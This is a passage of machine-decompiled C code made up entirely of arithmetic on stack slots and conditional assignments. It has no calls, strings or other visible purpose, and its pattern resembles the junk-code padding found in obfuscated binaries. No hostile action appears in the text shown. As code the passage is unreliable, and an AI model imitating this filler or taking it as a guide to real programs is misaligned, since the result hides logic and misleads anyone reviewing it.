				 *((intOrPtr*)(_t3971 - 0x168)) =  *((intOrPtr*)(_t3971 + 8)) + 0x50;
				 *(_t3971 - 0x578) =  *((intOrPtr*)(_t3971 + 8)) + 0x16b;
				 *((intOrPtr*)(_t3971 - 0x6e8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e2;
				 *(_t3971 - 0x344) =  *((intOrPtr*)(_t3971 + 8)) + 0x19f;
				 *((intOrPtr*)(_t3971 - 0x6ec)) =  *((intOrPtr*)(_t3971 + 8)) + 0xcc;
				 *((intOrPtr*)(_t3971 - 0x98)) =  *((intOrPtr*)(_t3971 + 8)) + 0xeb;
				 *((intOrPtr*)(_t3971 - 0x57c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x112;
				 *((intOrPtr*)(_t3971 - 0x348)) =  *((intOrPtr*)(_t3971 + 8)) + 0x3b;
				 *(_t3971 - 0x580) =  *((intOrPtr*)(_t3971 + 8)) + 0x8b;
				 *(_t3971 - 0x584) =  *((intOrPtr*)(_t3971 + 8)) + 0x134;
				 *(_t3971 - 0x34c) =  *((intOrPtr*)(_t3971 + 8)) + 0x71;
				 *(_t3971 - 0x350) =  *((intOrPtr*)(_t3971 + 8)) + 0x78;
				 *((intOrPtr*)(_t3971 - 0x588)) =  *((intOrPtr*)(_t3971 + 8)) + 0x23;
				 *(_t3971 - 0x354) =  *((intOrPtr*)(_t3971 + 8)) + 0x183;
				 *(_t3971 - 0x58c) =  *((intOrPtr*)(_t3971 + 8)) + 0x1f0;
				 *(_t3971 - 0x16c) =  *((intOrPtr*)(_t3971 + 8)) + 7;
				 *(_t3971 - 0x358) =  *((intOrPtr*)(_t3971 + 8)) + 0xbe;
				 *(_t3971 - 0x24) =  *((intOrPtr*)(_t3971 + 8)) + 0x107;
				 *((intOrPtr*)(_t3971 - 0x590)) =  *((intOrPtr*)(_t3971 + 8)) + 0x188;
				 *(_t3971 - 0x35c) =  *((intOrPtr*)(_t3971 + 8)) + 0xe7;
				 *((intOrPtr*)(_t3971 - 0x6f0)) =  *((intOrPtr*)(_t3971 + 8)) + 0xce;
				 *(_t3971 - 0x360) =  *((intOrPtr*)(_t3971 + 8)) + 0x178;
				 *((intOrPtr*)(_t3971 - 0x364)) =  *((intOrPtr*)(_t3971 + 8)) + 0x96;
				 *((intOrPtr*)(_t3971 - 0x594)) =  *((intOrPtr*)(_t3971 + 8)) + 0x7d;
				 *(_t3971 - 0x170) =  *((intOrPtr*)(_t3971 + 8)) + 0xf3;
				 *((intOrPtr*)(_t3971 - 0x368)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b5;
				 *((intOrPtr*)(_t3971 - 0x174)) =  *((intOrPtr*)(_t3971 + 8)) + 0xdf;
				 *(_t3971 - 0x36c) =  *((intOrPtr*)(_t3971 + 8)) + 0x5f;
				 *((intOrPtr*)(_t3971 - 0x598)) =  *((intOrPtr*)(_t3971 + 8)) + 0x13a;
				 *(_t3971 - 0x9c) =  *((intOrPtr*)(_t3971 + 8)) + 0xb;
				 *(_t3971 - 0x28) =  *((intOrPtr*)(_t3971 + 8)) + 0x179;
				 *(_t3971 - 0x59c) =  *((intOrPtr*)(_t3971 + 8)) + 0xc6;
				 *((intOrPtr*)(_t3971 - 0x6f4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x108;
				 *((intOrPtr*)(_t3971 - 0x5a0)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd6;
				 *(_t3971 - 0x178) =  *((intOrPtr*)(_t3971 + 8)) + 0x6a;
				 *(_t3971 - 0x5a4) =  *((intOrPtr*)(_t3971 + 8)) + 0x137;
				 *((intOrPtr*)(_t3971 - 0x6f8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x2b;
				 *(_t3971 - 0x5a8) =  *((intOrPtr*)(_t3971 + 8)) + 0x17e;
				 *(_t3971 - 0x370) =  *((intOrPtr*)(_t3971 + 8)) + 0xbf;
				 *(_t3971 - 0x17c) =  *((intOrPtr*)(_t3971 + 8)) + 0xbe;
				 *((intOrPtr*)(_t3971 - 0x374)) =  *((intOrPtr*)(_t3971 + 8)) + 0xf4;
				 *((intOrPtr*)(_t3971 - 0x6fc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e2;
				 *(_t3971 - 0x5ac) =  *((intOrPtr*)(_t3971 + 8)) + 0x190;
				 *((intOrPtr*)(_t3971 - 0x378)) =  *((intOrPtr*)(_t3971 + 8)) + 0x13e;
				 *((intOrPtr*)(_t3971 - 0x180)) =  *((intOrPtr*)(_t3971 + 8)) + 0x56;
				 *(_t3971 - 0x5b0) =  *((intOrPtr*)(_t3971 + 8)) + 0x4f;
				 *((intOrPtr*)(_t3971 - 0x184)) =  *((intOrPtr*)(_t3971 + 8)) + 0x186;
				 *((intOrPtr*)(_t3971 - 0x5b4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c4;
				 *(_t3971 - 0xa0) =  *((intOrPtr*)(_t3971 + 8)) + 0x17d;
				 *((intOrPtr*)(_t3971 - 0x700)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1dd;
				 *(_t3971 - 0x5b8) =  *((intOrPtr*)(_t3971 + 8)) + 0xa9;
				 *((intOrPtr*)(_t3971 - 0x37c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x19b;
				 *(_t3971 - 0x188) =  *((intOrPtr*)(_t3971 + 8)) + 0xe7;
				 *((intOrPtr*)(_t3971 - 0x380)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ad;
				 *((intOrPtr*)(_t3971 - 0x5bc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x4f;
				 *(_t3971 - 0x384) =  *((intOrPtr*)(_t3971 + 8)) + 0x147;
				 *((intOrPtr*)(_t3971 - 0xa4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c3;
				 *((intOrPtr*)(_t3971 - 0x704)) =  *((intOrPtr*)(_t3971 + 8)) + 0x152;
				 *((intOrPtr*)(_t3971 - 0x5c0)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd0;
				 *(_t3971 - 0x18c) =  *((intOrPtr*)(_t3971 + 8)) + 0xd9;
				 *((intOrPtr*)(_t3971 - 0x388)) =  *((intOrPtr*)(_t3971 + 8)) + 0x9b;
				 *((intOrPtr*)(_t3971 - 0x708)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e;
				 *((intOrPtr*)(_t3971 - 0x5c4)) =  *((intOrPtr*)(_t3971 + 8)) + 8;
				 *(_t3971 - 0x5c8) =  *((intOrPtr*)(_t3971 + 8)) + 0x18b;
				 *(_t3971 - 8) =  *((intOrPtr*)(_t3971 + 8)) + 0x10c;
				 *(_t3971 - 0x38c) =  *((intOrPtr*)(_t3971 + 8)) + 0x93;
				 *(_t3971 - 0xa8) =  *((intOrPtr*)(_t3971 + 8)) + 0x1da;
				 *((intOrPtr*)(_t3971 - 0x70c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x119;
				 *((intOrPtr*)(_t3971 - 0x390)) =  *((intOrPtr*)(_t3971 + 8)) + 0x16b;
				 *((intOrPtr*)(_t3971 - 0x5cc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x143;
				 *(_t3971 - 0x394) =  *((intOrPtr*)(_t3971 + 8)) + 0x1af;
				 *((intOrPtr*)(_t3971 - 0x5d0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x7a;
				 *(_t3971 - 0x190) =  *((intOrPtr*)(_t3971 + 8)) + 0xf6;
				 *((intOrPtr*)(_t3971 - 0x710)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd0;
				 *((intOrPtr*)(_t3971 - 0x714)) =  *((intOrPtr*)(_t3971 + 8)) + 0x151;
				 *((intOrPtr*)(_t3971 - 0x5d4)) =  *((intOrPtr*)(_t3971 + 8)) + 0xe2;
				 *(_t3971 - 0x5d8) =  *((intOrPtr*)(_t3971 + 8)) + 0x64;
				 *(_t3971 - 0x398) =  *((intOrPtr*)(_t3971 + 8)) + 0x144;
				 *((intOrPtr*)(_t3971 - 0x718)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c4;
				 *(_t3971 - 0x2a4) =  *(_t3971 - 0x488) *  *(_t3971 - 0x44);
				 *(_t3971 - 0x3ec) =  *(_t3971 - 8) *  *(_t3971 - 0x4c);
				 *(_t3971 - 0x50) =  *(_t3971 - 0x484) *  *(_t3971 - 0xf8);
				if( *((intOrPtr*)(_t3971 - 0x1a4)) <=  *(_t3971 - 0x64)) {
					 *((intOrPtr*)(_t3971 - 0x54c)) =  *(_t3971 - 0x17c) +  *((intOrPtr*)(_t3971 - 0x1c8));
				}
				if( *((intOrPtr*)(_t3971 - 0x5d0)) >=  *(_t3971 - 0x14)) {
					 *(_t3971 - 4) =  *(_t3971 - 0x120) +  *(_t3971 - 0x14);
				}
				if( *(_t3971 - 0x27c) <=  *((intOrPtr*)(_t3971 - 0x168))) {
					 *((intOrPtr*)(_t3971 - 0x74)) =  *(_t3971 - 0x90) +  *(_t3971 - 0x84);
				}
				 *(_t3971 - 0xb0) =  *(_t3971 - 0x5a8) *  *(_t3971 - 0xec);
				 *(_t3971 - 0x88) =  *(_t3971 - 0x370) *  *(_t3971 - 0xec);
				if( *((intOrPtr*)(_t3971 - 0x280)) <=  *(_t3971 - 0x2ac)) {
					 *((intOrPtr*)(_t3971 - 0x1e0)) =  *((intOrPtr*)(_t3971 - 0x46c)) +  *(_t3971 - 0x22c);
				}
				if( *(_t3971 - 0x16c) <=  *(_t3971 - 0x18)) {
					 *(_t3971 - 0x60) =  *(_t3971 - 0x318) +  *((intOrPtr*)(_t3971 - 0x508));
				}
				 *(_t3971 - 0xa8) =  *(_t3971 - 0x420) *  *(_t3971 - 0x68);
				if( *((intOrPtr*)(_t3971 - 0x31c)) >=  *(_t3971 - 0x33c)) {
					 *(_t3971 - 0x274) =  *((intOrPtr*)(_t3971 - 0x4d0)) +  *((intOrPtr*)(_t3971 - 0x594));
				}
				 *(_t3971 - 0xc0) =  *(_t3971 - 0x318) *  *(_t3971 - 0x160);
				 *(_t3971 - 0x234) =  *(_t3971 - 0xf0) *  *(_t3971 - 0x164);
				 *(_t3971 - 0x130) =  *(_t3971 - 0x44) *  *(_t3971 - 0x26c);
				if( *(_t3971 - 0x2bc) <=  *(_t3971 - 0x110)) {
					 *((intOrPtr*)(_t3971 - 0x3fc)) =  *((intOrPtr*)(_t3971 - 0xbc)) +  *(_t3971 - 0x200);
				}
				 *(_t3971 - 0x4d8) =  *(_t3971 - 0x584) *  *(_t3971 - 0x398);
				 *(_t3971 - 0x2f4) =  *(_t3971 - 0x2bc) *  *(_t3971 - 0x9c);
				 *(_t3971 - 0x3a8) =  *(_t3971 - 0x80) *  *(_t3971 - 0x40);
				 *(_t3971 - 0x6c) =  *(_t3971 - 0x1e8) *  *(_t3971 - 0x108);
				if( *(_t3971 - 0x354) >=  *((intOrPtr*)(_t3971 - 0x20c))) {
					 *(_t3971 - 0x5c) =  *((intOrPtr*)(_t3971 - 0x98)) +  *(_t3971 - 0x190);
				}
				if( *((intOrPtr*)(_t3971 - 0x368)) <=  *((intOrPtr*)(_t3971 - 0x524))) {
					 *(_t3971 - 0x1b8) =  *(_t3971 - 0x48) +  *(_t3971 - 0xc0);
				}
				if( *(_t3971 - 0x5c) <=  *(_t3971 - 0x358)) {
					 *(_t3971 - 0x6c) =  *(_t3971 - 0x2f8) +  *(_t3971 - 0x334);
				}
				if( *(_t3971 - 0x288) >=  *(_t3971 - 0x38)) {
					 *(_t3971 - 0x290) =  *(_t3971 - 0x10) +  *((intOrPtr*)(_t3971 - 0x2b0));
				}
				if( *((intOrPtr*)(_t3971 - 0xfc)) <=  *((intOrPtr*)(_t3971 - 0x184))) {
					 *(_t3971 - 0xf8) =  *((intOrPtr*)(_t3971 - 0x43c)) +  *((intOrPtr*)(_t3971 - 0x550));
				}
				if( *((intOrPtr*)(_t3971 - 0x300)) >=  *(_t3971 - 0xa0)) {
					 *(_t3971 - 0xa8) =  *(_t3971 - 0x1c) +  *(_t3971 - 4);
				}
				 *(_t3971 - 0x308) =  *(_t3971 - 0xec) *  *(_t3971 - 0x578);
				if( *((intOrPtr*)(_t3971 - 0x328)) <=  *((intOrPtr*)(_t3971 - 0xd4))) {
					 *((intOrPtr*)(_t3971 - 0x454)) =  *(_t3971 - 0x2b4) +  *((intOrPtr*)(_t3971 - 0x3b4));
				}
				 *(_t3971 - 0x78) =  *(_t3971 - 0x4d4) *  *(_t3971 - 0x564);
				 *(_t3971 - 0x5c8) =  *(_t3971 - 0x54) *  *(_t3971 - 0x5d8);
				if( *((intOrPtr*)(_t3971 - 0x284)) <=  *(_t3971 - 0x10c)) {
					 *(_t3971 - 0x170) =  *((intOrPtr*)(_t3971 - 0x74)) +  *(_t3971 - 0x50);
				}
				 *(_t3971 - 0x470) =  *(_t3971 - 0x10c) *  *(_t3971 - 0x190);
				if( *(_t3971 - 0x298) >=  *((intOrPtr*)(_t3971 - 0x3bc))) {
					 *((intOrPtr*)(_t3971 - 0x2b8)) =  *((intOrPtr*)(_t3971 - 0xbc)) +  *((intOrPtr*)(_t3971 - 0x20c));
				}
				if( *((intOrPtr*)(_t3971 - 0x4b0)) >=  *(_t3971 - 0x254)) {
					 *((intOrPtr*)(_t3971 - 0x5c0)) =  *((intOrPtr*)(_t3971 - 0x5a0)) +  *((intOrPtr*)(_t3971 - 0x3b8));
				}
				 *(_t3971 - 0x140) =  *(_t3971 - 0x18) *  *(_t3971 - 8);
				if( *((intOrPtr*)(_t3971 - 0x530)) <=  *((intOrPtr*)(_t3971 - 0xbc))) {
					 *((intOrPtr*)(_t3971 - 0x3e8)) =  *((intOrPtr*)(_t3971 - 0x408)) +  *((intOrPtr*)(_t3971 - 0x3c8));
				}
				 *(_t3971 - 0x4c8) =  *(_t3971 - 0x24) *  *(_t3971 - 0x354);
				 *(_t3971 - 0x3a0) =  *(_t3971 - 0x26c) *  *(_t3971 - 0xf4);
				 *(_t3971 - 0xe4) =  *(_t3971 - 0x9c) *  *(_t3971 - 0x1d0);
				if( *((intOrPtr*)(_t3971 - 0xc4)) >=  *(_t3971 - 0x58)) {
					 *((intOrPtr*)(_t3971 - 0x294)) =  *(_t3971 - 0x1e4) +  *(_t3971 - 0x1f8);
				}
				 *(_t3971 - 0x22c) =  *(_t3971 - 0x394) *  *(_t3971 - 0x44);
				if( *(_t3971 - 0x130) >=  *((intOrPtr*)(_t3971 - 0x534))) {
					 *(_t3971 - 0x25c) =  *(_t3971 - 0x34) +  *(_t3971 - 0x100);
				}
				 *(_t3971 - 0x15c) =  *(_t3971 - 0x10c) *  *(_t3971 - 0x120);
				 *(_t3971 - 0x50) =  *(_t3971 - 0x3c0) *  *(_t3971 - 0x34);
				 *(_t3971 - 0x338) =  *(_t3971 - 0xb8) *  *(_t3971 - 0x30c);
				 *(_t3971 - 0x228) =  *(_t3971 - 0x28) *  *(_t3971 - 0xb8);
				 *(_t3971 - 0x1ac) =  *(_t3971 - 0x230) *  *(_t3971 - 0x444);
				if( *(_t3971 - 0xa8) >=  *(_t3971 - 0x50)) {
					 *((intOrPtr*)(_t3971 - 0x29c)) =  *((intOrPtr*)(_t3971 - 0x348)) +  *((intOrPtr*)(_t3971 - 0x598));
				}
				 *(_t3971 - 0x160) =  *(_t3971 - 0xf4) *  *(_t3971 - 0x118);
				if( *((intOrPtr*)(_t3971 - 0x374)) >=  *((intOrPtr*)(_t3971 - 0x368))) {
					 *(_t3971 - 0x90) =  *((intOrPtr*)(_t3971 - 0x4f0)) +  *((intOrPtr*)(_t3971 - 0x128));
				}
				 *(_t3971 - 0x1f0) =  *(_t3971 - 0x2cc) *  *(_t3971 - 0x1bc);
				 *(_t3971 - 0x18c) =  *(_t3971 - 0x8c) *  *(_t3971 - 0x480);
				if( *((intOrPtr*)(_t3971 - 0xfc)) >=  *(_t3971 - 0x18)) {
					 *((intOrPtr*)(_t3971 - 0x378)) =  *((intOrPtr*)(_t3971 - 0x588)) +  *(_t3971 - 0x20);
				}
				if( *((intOrPtr*)(_t3971 - 0x4ac)) <=  *(_t3971 - 0x2e4)) {
					 *(_t3971 - 0x148) =  *(_t3971 - 0x15c) +  *(_t3971 - 0x48);
				}
				if( *(_t3971 - 0xe0) >=  *((intOrPtr*)(_t3971 - 0x1f4))) {
					 *(_t3971 - 0xa0) =  *(_t3971 - 0x4c) +  *((intOrPtr*)(_t3971 - 0x494));
				}
				 *(_t3971 - 0x220) =  *(_t3971 - 0x344) *  *(_t3971 - 0x210);
				 *(_t3971 - 0x178) =  *(_t3971 - 0x2e4) *  *(_t3971 - 0x208);
				 *(_t3971 - 0x138) =  *(_t3971 - 0x134) *  *(_t3971 - 0x52c);
				if( *(_t3971 - 0xd8) <=  *((intOrPtr*)(_t3971 - 0x568))) {
					 *(_t3971 - 0x80) =  *((intOrPtr*)(_t3971 - 0x2c4)) +  *(_t3971 - 0x13c);
				}
				if( *((intOrPtr*)(_t3971 - 0x168)) >=  *(_t3971 - 0x2f4)) {
					 *(_t3971 - 0x30) =  *(_t3971 - 0x1cc) +  *(_t3971 - 0x54);
				}
				 *(_t3971 - 0x4e4) =  *(_t3971 - 0x2d8) *  *(_t3971 - 0x21c);
				 *(_t3971 - 0x5b0) =  *(_t3971 - 0x60) *  *(_t3971 - 0x49c);
				 *(_t3971 - 0x3c) =  *(_t3971 - 0x59c) *  *(_t3971 - 0xb0);
				if( *(_t3971 - 0x164) <=  *((intOrPtr*)(_t3971 - 0xa4))) {
					 *((intOrPtr*)(_t3971 - 0x154)) =  *((intOrPtr*)(_t3971 - 0x364)) +  *(_t3971 - 0xd8);
				}
				if( *((intOrPtr*)(_t3971 - 0x1d8)) >=  *((intOrPtr*)(_t3971 - 0x324))) {
					 *(_t3971 - 0x158) =  *(_t3971 - 0x88) +  *(_t3971 - 0xd0);
				}
				if( *((intOrPtr*)(_t3971 - 0x3c4)) <=  *(_t3971 - 0x138)) {
					 *(_t3971 - 0x2c8) =  *((intOrPtr*)(_t3971 - 0x388)) +  *((intOrPtr*)(_t3971 - 0x128));
				}
				if( *((intOrPtr*)(_t3971 - 0x4dc)) >=  *(_t3971 - 0x194)) {
					 *(_t3971 - 0x68) =  *(_t3971 - 0x188) +  *((intOrPtr*)(_t3971 - 0xd4));
				}
				 *(_t3971 - 0x56c) =  *(_t3971 - 0x84) *  *(_t3971 - 0x4ec);
				 *(_t3971 - 0x558) =  *(_t3971 - 0x500) *  *(_t3971 - 0x124);
				if( *((intOrPtr*)(_t3971 - 0xa4)) <=  *(_t3971 - 0x2a4)) {
					 *(_t3971 - 0x20) =  *((intOrPtr*)(_t3971 - 0x374)) +  *((intOrPtr*)(_t3971 - 0x98));
				}
				 *(_t3971 - 0xf4) =  *(_t3971 - 0x358) *  *(_t3971 - 0x4cc);
				if( *(_t3971 - 0x218) <=  *(_t3971 - 0x58)) {
					 *(_t3971 - 0x40) =  *(_t3971 - 0x68) +  *((intOrPtr*)(_t3971 - 0x458));
				}
				 *(_t3971 - 0x12c) =  *(_t3971 - 0x264) *  *(_t3971 - 0x1e8);
				if( *((intOrPtr*)(_t3971 - 0x1fc)) >=  *((intOrPtr*)(_t3971 - 0x4e0))) {
					 *((intOrPtr*)(_t3971 - 0x154)) =  *(_t3971 - 0xb4) +  *((intOrPtr*)(_t3971 - 0x32c));
				}
				 *(_t3971 - 0xa0) =  *(_t3971 - 0x1d4) *  *(_t3971 - 0x120);
				if( *((intOrPtr*)(_t3971 - 0x184)) <=  *(_t3971 - 0x1c0)) {
					 *(_t3971 - 0x12c) =  *(_t3971 - 0x94) +  *(_t3971 - 0x264);
				}
				if( *(_t3971 - 4) >=  *((intOrPtr*)(_t3971 - 0x324))) {
					 *((intOrPtr*)(_t3971 - 0x7c)) =  *((intOrPtr*)(_t3971 - 0x490)) +  *(_t3971 - 0xc);
				}
				if( *(_t3971 - 0x8c) <=  *(_t3971 - 0x398)) {
					 *((intOrPtr*)(_t3971 - 0x5b4)) =  *(_t3971 - 0x178) +  *(_t3971 - 0xb0);
				}
				if( *(_t3971 - 0x44) <=  *((intOrPtr*)(_t3971 - 0x340))) {
					 *(_t3971 - 0x94) =  *(_t3971 - 0x14c) +  *(_t3971 - 0x34c);
				}
				if( *(_t3971 - 8) >=  *(_t3971 - 0x24)) {
					 *(_t3971 - 0x10) =  *(_t3971 - 0x140) +  *((intOrPtr*)(_t3971 - 0x204));
				}
				 *(_t3971 - 0x2c0) =  *(_t3971 - 0xf8) *  *(_t3971 - 0x34c);
				if( *(_t3971 - 0x114) >=  *((intOrPtr*)(_t3971 - 0x174))) {
					 *(_t3971 - 0x150) =  *((intOrPtr*)(_t3971 - 0x3f0)) +  *(_t3971 - 0x88);
				}
				if( *((intOrPtr*)(_t3971 - 0x300)) <=  *(_t3971 - 0x2dc)) {
					 *((intOrPtr*)(_t3971 - 0x4b8)) =  *((intOrPtr*)(_t3971 - 0x4c4)) +  *((intOrPtr*)(_t3971 - 0xa4));
				}
				 *(_t3971 - 0x260) =  *(_t3971 - 4) *  *(_t3971 - 0x270);
				if( *((intOrPtr*)(_t3971 - 0x464)) <=  *((intOrPtr*)(_t3971 - 0x1a4))) {
					 *(_t3971 - 0x9c) =  *(_t3971 - 0x2d0) +  *((intOrPtr*)(_t3971 - 0xfc));
				}
				if( *((intOrPtr*)(_t3971 - 0x2f0)) >=  *((intOrPtr*)(_t3971 - 0x1b4))) {
					 *(_t3971 - 0xe4) =  *(_t3971 - 0x34) +  *((intOrPtr*)(_t3971 - 0x1fc));
				}
				 *(_t3971 - 0xe0) =  *(_t3971 - 0x400) *  *(_t3971 - 0x1c);
				if( *(_t3971 - 0x88) >=  *(_t3971 - 0x2d4)) {
					 *((intOrPtr*)(_t3971 - 0x180)) =  *(_t3971 - 0xf0) +  *((intOrPtr*)(_t3971 - 0x380));
				}
				 *(_t3971 - 0xac) =  *(_t3971 - 0x430) *  *(_t3971 - 0x44c);
				if( *(_t3971 - 0x384) <=  *((intOrPtr*)(_t3971 - 0x180))) {
					 *((intOrPtr*)(_t3971 - 0x450)) =  *((intOrPtr*)(_t3971 - 0x3d4)) +  *(_t3971 - 0x2e0);
				}
				 *(_t3971 - 0x178) =  *(_t3971 - 0x16c) *  *(_t3971 - 0x2e0);
				 *(_t3971 - 0x244) =  *(_t3971 - 0x28c) *  *(_t3971 - 0x33c);
				if( *(_t3971 - 0x28) <=  *((intOrPtr*)(_t3971 - 0x388))) {
					 *((intOrPtr*)(_t3971 - 0x174)) =  *((intOrPtr*)(_t3971 - 0x128)) +  *((intOrPtr*)(_t3971 - 0xa4));
				}
				 *(_t3971 - 0x260) =  *(_t3971 - 0x230) *  *(_t3971 - 0x188);
				if( *((intOrPtr*)(_t3971 - 0x468)) >=  *(_t3971 - 0x90)) {
					 *((intOrPtr*)(_t3971 - 0x548)) =  *(_t3971 - 0x64) +  *(_t3971 - 0xe8);
				}
				 *(_t3971 - 0x1b0) =  *(_t3971 - 0x150) *  *(_t3971 - 0x148);
				if( *(_t3971 - 0xa8) >=  *((intOrPtr*)(_t3971 - 0x320))) {
					 *(_t3971 - 0xcc) =  *(_t3971 - 0x118) +  *((intOrPtr*)(_t3971 - 0x1e0));
				}
				if( *(_t3971 - 0x3c) >=  *((intOrPtr*)(_t3971 - 0x424))) {
					 *((intOrPtr*)(_t3971 - 0x174)) =  *(_t3971 - 0x80) +  *((intOrPtr*)(_t3971 - 0x5d4));
				}
				 *(_t3971 - 0x18c) =  *(_t3971 - 0xe8) *  *(_t3971 - 0xcc);
				 *(_t3971 - 0x1e4) =  *(_t3971 - 0x4a8) *  *(_t3971 - 0x1f8);
				if( *(_t3971 - 0x164) <=  *(_t3971 - 0xc)) {
					 *((intOrPtr*)(_t3971 - 0x504)) =  *((intOrPtr*)(_t3971 - 0x340)) +  *(_t3971 - 0xc);
				}
				if( *((intOrPtr*)(_t3971 - 0x284)) >=  *(_t3971 - 0x14c)) {
					 *((intOrPtr*)(_t3971 - 0x3cc)) =  *(_t3971 - 0x188) +  *(_t3971 - 0x258);
				}
				 *(_t3971 - 0x1ec) =  *(_t3971 - 0x438) *  *(_t3971 - 0x288);
				 *(_t3971 - 0x344) =  *(_t3971 - 0x1ec) *  *(_t3971 - 0x47c);
				if( *((intOrPtr*)(_t3971 - 0x380)) <=  *((intOrPtr*)(_t3971 - 0x11c))) {
					 *(_t3971 - 0x238) =  *(_t3971 - 0x214) +  *(_t3971 - 0x1a0);
				}
				if( *((intOrPtr*)(_t3971 - 0x514)) >=  *(_t3971 - 0x12c)) {
					 *(_t3971 - 0x38c) =  *((intOrPtr*)(_t3971 - 0x57c)) +  *(_t3971 - 0x2c0);
				}
				if( *(_t3971 - 0x144) >=  *(_t3971 - 0x114)) {
					 *((intOrPtr*)(_t3971 - 0x3f8)) =  *((intOrPtr*)(_t3971 - 0x4fc)) +  *(_t3971 - 0x158);
				}
				 *(_t3971 - 0x2a0) =  *(_t3971 - 0x240) *  *(_t3971 - 0x2c);
				 *(_t3971 - 0x1a8) =  *(_t3971 - 0x38c) *  *(_t3971 - 0x3f4);
				 *(_t3971 - 0x1b8) =  *(_t3971 - 0x64) *  *(_t3971 - 0x560);
				if( *(_t3971 - 0x38) >=  *((intOrPtr*)(_t3971 - 0x204))) {
					 *((intOrPtr*)(_t3971 - 0x224)) =  *((intOrPtr*)(_t3971 - 0x590)) +  *((intOrPtr*)(_t3971 - 0x294));
				}
				if( *((intOrPtr*)(_t3971 - 0xc4)) <=  *((intOrPtr*)(_t3971 - 0x4f4))) {
					 *((intOrPtr*)(_t3971 - 0x4a0)) =  *(_t3971 - 0xb8) +  *(_t3971 - 0x34);
				}
				if( *(_t3971 - 0x170) >=  *((intOrPtr*)(_t3971 - 0x418))) {
					 *((intOrPtr*)(_t3971 - 0x4a4)) =  *((intOrPtr*)(_t3971 - 0x55c)) +  *(_t3971 - 0xac);
				}
				if( *((intOrPtr*)(_t3971 - 0x3b0)) >=  *((intOrPtr*)(_t3971 - 0x53c))) {
					 *(_t3971 - 0x21c) =  *(_t3971 - 0x108) +  *(_t3971 - 0x48);
				}
				if( *(_t3971 - 0x2c) >=  *(_t3971 - 0xdc)) {
					 *((intOrPtr*)(_t3971 - 0x314)) =  *((intOrPtr*)(_t3971 - 0x570)) +  *(_t3971 - 0x36c);
				}
				 *(_t3971 - 0x1cc) =  *(_t3971 - 0x28) *  *(_t3971 - 0x1c);
				if( *(_t3971 - 0x198) >=  *(_t3971 - 0x40)) {
					 *((intOrPtr*)(_t3971 - 0x5c4)) =  *((intOrPtr*)(_t3971 - 0x74)) +  *((intOrPtr*)(_t3971 - 0x440));
				}
				 *(_t3971 - 0x2d0) =  *(_t3971 - 0x248) *  *(_t3971 - 0x5b8);
				 *(_t3971 - 0x498) =  *(_t3971 - 0x10) *  *(_t3971 - 0x124);
				 *(_t3971 - 0x258) =  *(_t3971 - 0x114) *  *(_t3971 - 0x220);
				 *(_t3971 - 0x1bc) =  *(_t3971 - 0x244) *  *(_t3971 - 0x2ac);
				 *(_t3971 - 0x2a0) =  *(_t3971 - 0x78) *  *(_t3971 - 0x40c);
				 *(_t3971 - 0x60) =  *(_t3971 - 0x110) *  *(_t3971 - 0x5ac);
				 *(_t3971 - 0x100) =  *(_t3971 - 0x278) *  *(_t3971 - 0x104);
				if( *((intOrPtr*)(_t3971 - 0x31c)) >=  *((intOrPtr*)(_t3971 - 0x364))) {
					 *(_t3971 - 0x104) =  *(_t3971 - 0x240) +  *(_t3971 - 0x60);
				}
				 *(_t3971 - 0x334) =  *(_t3971 - 0x14) *  *(_t3971 - 0x130);
				if( *(_t3971 - 0x150) <=  *((intOrPtr*)(_t3971 - 0x3e0))) {
					 *((intOrPtr*)(_t3971 - 0x19c)) =  *(_t3971 - 0x78) +  *(_t3971 - 0x70);
				}
				if( *(_t3971 - 0x104) <=  *(_t3971 - 0x6c)) {
					 *((intOrPtr*)(_t3971 - 0x168)) =  *(_t3971 - 0x110) +  *(_t3971 - 0x18);
				}
				if( *((intOrPtr*)(_t3971 - 0x314)) >=  *(_t3971 - 0x108)) {
					 *(_t3971 - 0xc8) =  *((intOrPtr*)(_t3971 - 0x37c)) +  *((intOrPtr*)(_t3971 - 0x2f0));
				}
				 *(_t3971 - 0x18c) =  *(_t3971 - 0x2ec) *  *(_t3971 - 0xcc);
				 *(_t3971 - 0x3e4) =  *(_t3971 - 0x51c) *  *(_t3971 - 0x84);
				 *(_t3971 - 0x2c8) =  *(_t3971 - 0x350) *  *(_t3971 - 0x58);
				 *(_t3971 - 0x58c) =  *(_t3971 - 0x5c) *  *(_t3971 - 0x254);
				 *(_t3971 - 0x200) =  *(_t3971 - 0x50c) *  *(_t3971 - 0x48c);
				if( *(_t3971 - 0x24) <=  *(_t3971 - 0x10)) {
					 *(_t3971 - 0x94) =  *((intOrPtr*)(_t3971 - 0x2c4)) +  *((intOrPtr*)(_t3971 - 0x510));
				}
				 *(_t3971 - 0x17c) =  *(_t3971 - 0x478) *  *(_t3971 - 0x234);
				if( *((intOrPtr*)(_t3971 - 0x390)) <=  *((intOrPtr*)(_t3971 - 0x320))) {
					 *(_t3971 - 0xdc) =  *(_t3971 - 0x208) +  *((intOrPtr*)(_t3971 - 0x7c));
				}
				 *(_t3971 - 0x290) =  *(_t3971 - 0x538) *  *(_t3971 - 0x2e8);
				 *(_t3971 - 0x298) =  *(_t3971 - 0x360) *  *(_t3971 - 0x2fc);
				if( *(_t3971 - 0x338) >=  *(_t3971 - 0x28)) {
					 *((intOrPtr*)(_t3971 - 0x4e8)) =  *((intOrPtr*)(_t3971 - 0x74)) +  *((intOrPtr*)(_t3971 - 0x1b4));
				}
				 *(_t3971 - 0xc) =  *(_t3971 - 0x14) *  *(_t3971 - 0x268);
